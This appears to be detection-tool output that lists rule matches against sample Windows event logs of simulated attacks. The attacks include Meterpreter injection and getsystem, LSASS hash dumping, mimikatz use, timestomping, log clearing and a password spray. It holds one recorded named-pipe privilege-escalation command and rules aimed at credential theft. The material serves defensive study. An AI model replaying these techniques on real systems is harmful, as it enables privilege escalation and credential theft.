2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2144 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010CE400E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1344 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-001058500E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:26:34.133 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\vboxsrv\HTools\m.exe | Tgt Process: C:\Windows\explorer.exe | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/meterpreter_migrate_to_explorer_sysmon_8.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /c echo msdhch > \\.\pipe\msdhch | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4088 | PGUID: 365ABB72-FD47-5CC7-0000-00106AF61D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Meterpreter or Cobalt Strike Getsystem Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
2019-04-30 19:12:45.583 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\system32\cmd.exe | PID: 3292 | PGUID: 365ABB72-1EFA-5CC8-0000-0010D3DE1C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx
2019-04-30 19:13:42.052 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\Explorer.EXE | CreationUtcTime: 2016-02-02 15:30:02.000 | PreviousCreationUtcTime: 2019-04-30 10:12:45.583 | PID: %PID% | PGUID: 365ABB72-16CD-5CC8-0000-0010483A0600,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-3FDE-5CC8-0000-0010142B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-3FDF-5CC8-0000-00103C480000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-0010014C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00101E4C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00104D520000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00100D550000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,../hayabusa-rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,../hayabusa-rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,../hayabusa-rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Evas,Security Log Cleared,User: jwrig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:02.847 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:celgee/mtoussain/psmith/jleytevidal/sanson/eskoudis/edygert/drook/cragoso/tbennett/bking/cdavis/ebooth/ssims/cfleener/jwright/jlake/thessman/econrad/jorchilles/bgreenwood/zmathis/rbowes/Administrator/bhostetler/sarmstrong/lpesce/lschifano/dpendolino/kperryman/jkulikowski/wstrzelec/mdouglas/gsalinas/baker/smisenar/dmashburn/bgalbraith/cspizor/cmoody/melliott IpAddress:172.16.144.128 timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,-
2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
